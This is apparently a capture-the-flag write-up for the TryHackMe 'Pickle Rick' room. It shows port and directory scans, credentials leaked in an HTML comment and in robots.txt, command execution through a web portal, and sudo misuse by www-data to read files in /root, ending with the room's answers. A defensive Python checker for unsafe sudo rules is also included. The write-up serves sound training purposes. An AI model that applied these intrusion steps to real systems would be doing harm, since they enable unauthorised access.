
Pickle Rick

Date: 10 November, 2021

Author: Dhaval Kotak

Room: Pickle Rick

Port Scanning

nanomite @ zeus in ~/thm/pickle_rick
⚡️ nmap -A 10.10.117.227 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 15:15 IST
Nmap scan report for 10.10.117.227
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c7:6f:b8:7d:07:b7:15:ce:0e:72:c5:f3:26:9c:d2:58 (RSA)
|   256 57:a8:4c:12:5a:15:78:f0:d4:85:40:54:db:04:3b:a3 (ECDSA)
|_  256 67:bb:90:10:c9:3e:30:4b:0f:81:34:d1:98:b6:5c:bc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.38 seconds

Gobuster Scanning

nanomite @ zeus in ~/thm/pickle_rick
⚡️ gobuster dir -u http://10.10.117.227 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.117.227
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/10 15:17:16 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 297]
/.htpasswd            (Status: 403) [Size: 297]
/assets               (Status: 301) [Size: 315] [--> http://10.10.117.227/assets/]
/denied.php           (Status: 302) [Size: 0] [--> /login.php]                  
/index.html           (Status: 200) [Size: 1062]                                
/login.php            (Status: 200) [Size: 882]                                 
/portal.php           (Status: 302) [Size: 0] [--> /login.php]                  
/robots.txt           (Status: 200) [Size: 17]                            
/server-status        (Status: 403) [Size: 299]                                 

===============================================================
2021/11/10 15:18:38 Finished
===============================================================

Information Gathering

Username

We find a username in an HTML comment in the source code of the website's home page:

<!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

Robots.txt

Looking at robots.txt, we find this text instead of any Allow or Disallow directives:

Wubbalubbadubdub

Login.php

We can try these two values as the username and password on login.php:

R1ckRul3s:Wubbalubbadubdub

And we are logged in!

Command Execution

By running ls, we get the following result:

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Commands like cat, head and tail do not work through the portal, so I tried less to print the file instead:

less Sup3rS3cretPickl3Ingred.txt

What is the first ingredient Rick needs?

  • mr. meeseek hair

As per the clue, the other ingredient was somewhere in the file system.

So I looked in /home/rick, where I found the second ingredient:

cd /home/rick; less "second ingredients"

What is the second ingredient Rick needs?

  • 1 jerry tear

I guess the final ingredient is in /root, so let's first check whether there is anything we are allowed to run as root.

sudo -l

Matching Defaults entries for www-data on ip-10-10-117-227.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-117-227.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

This means www-data can run any command as root without a password. Fantastic!
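A defender's check for the misconfiguration shown here, added as an example that is not part of the original writeup: it parses `sudo -l` output (the sample below is constructed from this page's own output) and grades each rule, flagging a service account with `(ALL) NOPASSWD: ALL` as critical. The `SERVICE_ACCOUNTS` list and the severity scale are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: the `sudo -l` output this page shows for www-data.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on ip-10-10-117-227.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-117-227.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
"""

# Hypothetical list of service accounts that should never hold sudo rules.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres"}

# One sudoers rule line as sudo -l prints it: "(runas) TAG: commands".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


@dataclass
class Finding:
    user: str
    runas: str
    nopasswd: bool
    commands: str
    severity: str


def parse_sudo_l(text: str) -> List[Finding]:
    """Parse `sudo -l` output and grade each rule from a defender's view."""
    user, findings = None, []
    for line in text.splitlines():
        m = re.match(r"^User (\S+) may run the following commands", line)
        if m:
            user = m.group(1)          # rule lines follow this header
            continue
        m = RULE_RE.match(line) if user else None
        if not m:
            continue                   # Defaults block or blank line
        runas = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> ALL
        nopasswd = "NOPASSWD:" in m.group("tags")
        cmds = m.group("cmds").strip()
        root_all = cmds == "ALL" and runas in ("ALL", "root")
        if root_all and nopasswd:
            severity = "critical"      # the www-data case on this page
        elif root_all or nopasswd or user in SERVICE_ACCOUNTS:
            severity = "high"
        else:
            severity = "info"
        findings.append(Finding(user, runas, nopasswd, cmds, severity))
    return findings
```

The fix for a critical finding is to remove the service account's sudoers entry entirely (via visudo); a web server account has no business holding any sudo rule.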

sudo ls -la /root

total 28
drwx------  4 root root 4096 Feb 10  2019 .
drwxr-xr-x 23 root root 4096 Nov 10 09:45 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  3 root root 4096 Feb 10  2019 snap

sudo less /root/3rd.txt

3rd ingredients: fleeb juice

What is the final ingredient Rick needs?

  • fleeb juice
